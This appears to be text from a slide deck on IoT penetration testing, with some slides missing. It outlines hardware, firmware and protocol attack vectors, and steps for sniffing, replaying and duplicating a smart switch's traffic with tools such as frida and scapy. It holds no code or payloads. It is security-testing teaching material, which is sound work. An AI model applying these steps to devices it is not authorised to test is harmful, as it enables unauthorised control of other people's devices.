4. Attack Surfaces on IoT
● Hardware Level
● Software Level
● Communication Protocol Analysis
5. Hardware Level Attack Vectors
● Hardware Level
○ Gaining shell via debug points
■ Identifying the communication points
(Tx, Rx)
○ Dumping firmware from the memory chip
■ De-soldering the component and read
the content.
○ Fault Injection
■ Voltage/Clock Glitching
■ Optical Fault Injection
■ Electromagnetic Fault Injection
6. Software Level Attack Vectors
● Software Level
○ Getting sensitive information from the
firmware
○ Modifying the firmware
○ Updating the malicious firmware
○ Gaining shell via default password
○ Emulate the firmware
○ Hook the function and understand the
logic
7. Communication Attack Surface
● Communication Level
○ Sniffing
○ Injection attack
○ Fuzzing the protocol
○ Replay Attack
○ MiTM
9. Pentester’s Approach
● Understanding the Architecture
● Identifying the attack vectors on the Smart switch
● Observing Hardware details
● Extracting Firmware from the chip
● Analyzing the firmware for the sensitive information
● Getting into the network
● Understanding the communication
● Duplicating the communication and controlling the switch
10. Hardware Level - Identifying the Hardware details
● Open the IoT device hardware
● Identify each component
● Identify the ways to communicate with chip
● Identify the model of CPU/SPI
● To communicate with CPU/SPI download the
datasheet and understand the way to
communicate with CPU.
11. Download the firmware via onboard pins
● Identify the on board pins to communicate with
CPU
23. Communication Protocol Analysis
● Sniff the packets between the Mobile Application and Switch
● Create the duplicate request
● Send it to the Switch IP and check the status.
24. Packet Duplication
● We need to perform MiTM attack to sniff the traffic between the
application and Switch.
27. Alternative Ways
1. Use frida to hook the exact function which creates the request
○ Helps in understanding the encryption logic
○ Control other switches
2. Use scapy to create network packet and send it to switch
○ Understand the packet structure